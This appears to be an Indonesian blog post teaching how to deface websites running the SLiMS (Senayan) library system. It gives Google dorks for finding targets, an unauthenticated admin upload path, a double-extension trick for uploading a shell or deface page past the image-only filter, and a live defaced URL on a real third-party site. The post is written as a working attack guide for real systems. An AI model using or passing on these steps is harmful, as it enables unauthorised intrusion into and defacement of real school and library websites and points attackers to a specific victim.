Deface Senayan Exploit Repository

Assalamualaikum Wr wb
Deface Metode Senayan Exploit Repository Upload
(Indonesian Website)
Ekstensi Yg Bisa Di Upload:jpg,gif,png
jadi kalian mesti Maen Bypas Ekstensi
=======================================================================
Google Dork: intext:''The Winner in the Category of OSS Indonesia ICT Award 2009''
             inurl:''index.php?p=show_detail&id='' site:id
             inurl:''/slims5-meranti/'' site:id
             intext:This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009''
             Powered by SLiMS site:id
             Powered by SLiMS | Design by Indra Sutriadi Pipii
             inurl:''/index.php?select_lang='' site:sch.id
             inurl:''/perpustakaan/repository/'' site:id
=======================================================================
Exploit: /admin/modules/bibliography/pop_attach.php
=======================================================================
Langkah-Langkah:
1.Dorking Di Google
2.Lalu Pilih Web yg Vuln dan masukan Exploit
  contoh https://target.com/bla bla bla:v
  jadi  https://target.com/admin/modules/bibliography/pop_attach.php
  (You Knowlah)
3.Otomatis kalian akan masuk ke halaman upload Repository

4.Upload File Kalian Ekstensi Jpg,Png,Gif
  (Bypas Shell Atau Script Defacemu)
5.Panggil Shellmu dengan path http://www.target.com/senayan/repository/filemu.htm.jpg

Live Target: http://www.thaiabc.com/senayan/repository/sad.htm.jpg
     

Bagikan Artikel ini